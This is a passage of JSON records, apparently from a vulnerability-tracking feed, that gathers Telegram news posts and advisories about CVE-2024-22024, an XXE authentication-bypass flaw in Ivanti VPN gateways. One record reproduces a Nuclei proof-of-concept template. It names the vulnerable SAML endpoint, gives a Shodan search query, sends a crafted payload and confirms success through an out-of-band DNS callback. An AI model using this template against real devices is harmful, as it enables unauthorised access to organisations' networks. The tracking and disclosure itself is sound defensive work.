"50814e89-64c6-4e9d-b8ea-1ce0d2cad9cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "https://t.me/true_secator/5404", "content": "\u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0445 \u043f\u043e\u0434\u043a\u0430\u0442\u0438\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0434\u043b\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 Ivanti VPN 0-day, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0437\u043d\u0430\u043c\u0435\u043d\u043e\u0432\u0430\u043b\u0438 \u043d\u0430\u0447\u0430\u043b\u043e \u043d\u043e\u0432\u043e\u0439 \u0432\u043e\u043b\u043d\u044b \u0430\u0442\u0430\u043a.\n\n\u041f\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044e \u0440\u044f\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e \u043e\u0431\u044a\u0435\u043a\u0442\u0430 XML (XXE), \u0432\u043b\u0438\u044f\u044e\u0449\u0430\u044f \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 VPN-\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Ivanti \u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0435\u0442\u0438, \u0441\u0442\u0430\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0417\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 SAML \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0448\u043b\u044e\u0437\u043e\u0432 Ivanti Connect Secure, Policy Secure \u0438 ZTA, CVE-2024-22024 \u0441 CVSS 8,3 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u00a0\u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0434\u043b\u044f Connect Secure \u0432\u0435\u0440\u0441\u0438\u0439 9.x \u0438 22.x, Policy Secure \u0432\u0435\u0440\u0441\u0438\u0439 9.x \u0438 22.x \u0438 \u0448\u043b\u044e\u0437\u043e\u0432 ZTA \u0432\u0435\u0440\u0441\u0438\u0438 22.x.\n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a WatchTowr \u0441 \u0443\u0447\u0435\u0442\u043e\u043c \u043e\u0441\u043e\u0431\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u043a \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c VPN-\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u043c Ivanti \u043d\u0435 \u0441\u0442\u0430\u043b\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c PoC, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0437\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0432\u0441\u0435 \u0436\u0435 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u043e\u0434\u043e\u0432\u0430\u043d\u044b.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0441\u043e \u0441\u043b\u043e\u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0414\u044d\u0432\u0438\u0434\u0430 \u0412\u043e\u0440\u0435\u043b\u0430,\u00a0\u0432\u0437\u043b\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0441\u044f \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0431\u044b\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u044b \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u0441\u0431\u0440\u043e\u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0441\u0430\u043c\u0430 Ivanti \u043d\u0435 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e CVE-2024-22024 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u0445\u043e\u0434\u0435 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0433\u043e \u0430\u0443\u0434\u0438\u0442\u0430 \u043a\u043e\u0434\u0430 \u0438 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 WatchTowr.", "creation_timestamp": "2024-02-12T17:10:06.000000Z"}, {"uuid": "ebcad781-984f-4857-a144-d5b867a01b29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1372", "content": "", "creation_timestamp": "2024-03-19T16:04:26.000000Z"}, {"uuid": "ee478a92-e651-4b5a-af29-698c09a013bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/true_secator/5397", "content": "\u041a\u0430\u043a \u0438 \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0437\u043e\u043d \u0431\u0435\u0441\u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0438\u0430\u043b\u0430 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Ivanti 0-day \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0434\u0430\u043b\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043e\u0441\u0442\u0440\u043e\u0441\u044e\u0436\u0435\u0442\u043d\u044b\u043c.\n\n\u0412 Connect Secure, Policy Secure \u0438 ZTA \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2024-22024 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e XXE (XML eXternal Entities) \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 SAML \u0448\u043b\u044e\u0437\u043e\u0432.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c \u043d\u0430 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0432 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0438\u043b\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u0422\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u043e Ivanti \u043e\u0431\u043d\u0430\u0434\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u0441\u0432\u043e\u0438\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0441\u043e\u043e\u0431\u0449\u0430\u044f \u043e\u0431 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0438 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f CVE-2024-22024. \u041d\u043e \u0442\u0430\u043a\u0436\u0435 \u043f\u043e \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u0438 \u0432\u043e\u0441\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u044d\u0442\u043e \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c.\n\n\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043a\u0440\u0430\u0439\u043d\u0435 \u0432\u0430\u0436\u043d\u043e \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u043c \u043c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b Shadowserver, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0438 \u043d\u0430\u0441\u0447\u0438\u0442\u0430\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 20 000 VPN-\u0448\u043b\u044e\u0437\u043e\u0432 ICS \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 (\u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shodan, \u0431\u043e\u043b\u0435\u0435 26 000). \n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043d\u0435 \u0441\u0442\u0438\u0445\u0430\u0435\u0442 \u0438 \u0442\u043e\u043b\u044c\u043a\u043e 7 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u0431\u044b\u043b\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043e\u00a0\u043f\u043e\u0447\u0442\u0438 250 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0432\u043f\u043e\u043b\u043d\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0447\u0442\u043e \u0441\u043a\u043e\u0440\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u043d\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f \u0438\u043d\u043e\u0433\u043e \u0432\u044b\u0431\u043e\u0440\u0430, \u043a\u0430\u043a \u043f\u043e\u043f\u0440\u043e\u0441\u0442\u0443 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u0432\u0441\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 Ivanti VPN \u0432 \u0441\u0432\u043e\u0438\u0445 \u0441\u0435\u0442\u044f\u0445 \u0432 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u0438 \u0432\u043d\u044f\u0442\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043e\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u0430 \u043f\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443 \u0432\u0441\u0435\u0445 \u043d\u0430\u043a\u043e\u043f\u0438\u0432\u0448\u0438\u0445\u0441\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c.", "creation_timestamp": "2024-08-06T17:54:54.000000Z"}, {"uuid": "35c08633-476f-43a0-a3e4-4f8a9808675d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/450", "content": "Nuclei PoC for Ivanti XXE (CVE-2024-22024)\n\nid: CVE-2024-22024\n\ninfo:\n  name: Ivanti Connect Secure - XXE\n  author: watchTowr\n  severity: high\n  description: |\n    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.\n  remediation: |\n    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.\n  reference:\n    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/\n    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1\n  metadata:\n    max-request: 1\n    vendor: ivanti\n    product: \"connect_secure\"\n    shodan-query: \"html:\\\"welcome.cgi?p=logo\\\"\"\n  tags: cve,cve2024,kev,xxe,ivanti\n\nvariables:\n  payload: ' %watchTowr;]&gt;'\n\nhttp:\n  - raw:\n      - |\n        POST /dana-na/auth/saml-sso.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        SAMLRequest={{base64(payload)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol  # Confirms the DNS Interaction\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - '/dana-na/'\n          - 'WriteCSS'\n        condition: and\n# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950\n\n#Nuclei #Templates #PoC #XXE\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/BugCod3BOT \n\ud83d\udce3 T.me/BugCod3", "creation_timestamp": "2024-02-10T03:25:31.000000Z"}, {"uuid": "a1a85e41-2408-465b-b584-4a9104b35f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/ctinow/198853", "content": "https://ift.tt/TyKsQiJ\nCVE-2024-22024 | Ivanti Connect Secure/Policy Secure SAML xml external entity reference", "creation_timestamp": "2024-03-03T18:16:38.000000Z"}, {"uuid": "314b5327-3189-40e5-9e22-c4f400c14ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/ctinow/183603", "content": "https://ift.tt/TV6wzWP\nCVE-2024-22024", "creation_timestamp": "2024-02-13T05:21:21.000000Z"}, {"uuid": "3fcbb90d-cc39-4567-a788-4bddf7b31698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/GDSpace/1202", "content": "\u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440 \u043f\u043e \u0418\u0411, \u0432\u044b\u043f\u0443\u0441\u043a \u211622 (10.02.2024): \u0412\u0438\u0436\u0443 MacBook \u2014 \u043c\u043d\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\n\n\ud83d\udd38 \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041b\u0435\u043e\u043d\u043e\u0432, \"\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435\"\n\ud83d\udd38 \u041b\u0435\u0432 \u041f\u0430\u043b\u0435\u0439, \"\u0412\u0435\u0441\u0442\u0438 \u0438\u0437 \u041f\u0430\u043b\u0435\u0439\"\n\ud83d\udd38 \u041c\u0430\u043a\u0441\u0438\u043c \u0425\u0430\u0440\u0430\u0441\u043a, \"Global Digital Space\"\n\n00:00 \u0417\u0434\u043e\u0440\u043e\u0432\u0430\u0435\u043c\u0441\u044f, \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0443, \u0440\u0430\u0437\u0433\u043e\u043d\u044f\u0435\u043c \u043f\u0440\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apple\n03:31 \u0413\u0434\u0435 \u0431\u044b\u043b \u041b\u0435\u0432: \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043a\u0430\u0440\u044c\u0435\u0440\u0443 \u0441  \u0415\u0432\u0433\u0435\u043d\u0438\u0435\u043c \u041f\u0438\u0442\u043e\u043b\u0438\u043d\u044b\u043c \u0438 \u0434\u0435\u0431\u0430\u0442\u044b \u043d\u0430 AM Live\n09:42 4 \u0430\u043f\u0440\u0435\u043b\u044f \u0441\u043e\u0441\u0442\u043e\u0438\u0442\u0441\u044f \u0444\u043e\u0440\u0443\u043c \"\u0422\u0435\u0440\u0440\u0438\u0442\u043e\u0440\u0438\u044f \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - 2024: \u0432\u0441\u0435 pro \u0418\u0411\"\n13:42 \u041c\u0435\u043c \u043f\u0440\u043e \u0442\u044f\u0436\u0435\u043b\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e \u0434\u043b\u044f Fortinet\n14:21 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Fortinet FortiOS \u0438 FortiProxy (CVE-2024-21762) \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e\n19:16 Fortinet \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0434\u0432\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 FortiSIEM\n21:06 \u041e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f AuthBypass \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Ivanti Connect Secure, Ivanti Policy Secure \u0438 ZTA (CVE-2024-22024)\n23:02 \u0417\u0430\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438\u0437 PT SWARM\n28:51 \u0412\u0437\u043b\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 AnyDesk \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0442 \u041d\u041a\u0426\u041a\u0418\n33:51 \u041d\u0443\u0436\u0435\u043d \u043b\u0438 \u0410\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441 (\u0438\u043b\u0438 \u0448\u0438\u0440\u0435 - Endpoint Protection) \u043d\u0430 Linux \u0445\u043e\u0441\u0442\u0430\u0445?\n41:33 \u0411\u044b\u0432\u0448\u0435\u0433\u043e \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 Apple \u043f\u0440\u0438\u0433\u043e\u0432\u043e\u0440\u0438\u043b\u0438 \u043a \u0442\u044e\u0440\u0435\u043c\u043d\u043e\u043c\u0443 \u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u0437\u0430 \u043a\u0440\u0430\u0436\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0431 \u0430\u0432\u0442\u043e\u043c\u043e\u0431\u0438\u043b\u0435\n44:47 \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0431\u0432\u0438\u043d\u0438\u043b\u0438 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e $3 \u043c\u043b\u043d \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u043e\u0442 Apple \u0432 \u0432\u0438\u0434\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0446\u0438\u0438 \u0438 \u0443\u0441\u043b\u0443\u0433 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438\n49:38 \u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0418\u0433\u0440\u044b \u0411\u0443\u0434\u0443\u0449\u0435\u0433\u043e 2024?\n53:03 \u0411\u0430\u043d\u043a \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043f\u043e\u0440\u0442\u0440\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u044b \u043a\u0438\u0431\u0435\u0440\u043c\u043e\u0448\u0435\u043d\u043d\u0438\u043a\u043e\u0432\n55:26 \ud83c\udfa4 Mr. X \u0438 \u041e\u043b\u0435\u0433 \u0422\u0438\u043d\u044c\u043a\u043e\u0432 \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0437\u0430 \u044d\u0442\u043e\u0442 \u044d\u043f\u0438\u0437\u043e\u0434 \u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440\u0430 \u043f\u043e \u0418\u0411\n\n@avleonovrus #\u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440\u041f\u043e\u0418\u0411 #Apple #tb2024 #Fortinet #FortiOS #FortiProxy #FortiSIEM #Ivanti #AnyDesk #\u041d\u041a\u0426\u041a\u0418  #Linux #Antivirus #\u0418\u0433\u0440\u044b\u0411\u0443\u0434\u0443\u0449\u0435\u0433\u043e #PositiveTechnologies #PTSWARM", "creation_timestamp": "2024-02-12T06:19:49.000000Z"}, {"uuid": "5e00d6ca-b9ba-4dc3-a185-907370b1f02d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/thehackernews/4525", "content": "\ud83d\udea8 Deja Vu for Ivanti users! \n \nAnother authentication bypass security vulnerability (CVE-2024-22024) has been found in #Ivanti products, affecting Connect Secure, Policy Secure, and ZTA gateways. \n \nDetails: https://thehackernews.com/2024/02/warning-new-ivanti-auth-bypass-flaw.html \n \nDon't wait, patch ASAP to secure your devices!", "creation_timestamp": "2024-02-09T06:47:24.000000Z"}, {"uuid": "47204ae7-31ed-4bc2-b6e4-0a75a3db53fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/xakep_ru/15371", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0438\u0437\u044b\u0432\u0430\u044e\u0442 \u0441\u0440\u043e\u0447\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0442\u0447\u0438 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Ivanti\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Ivanti \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430 \u043e \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, 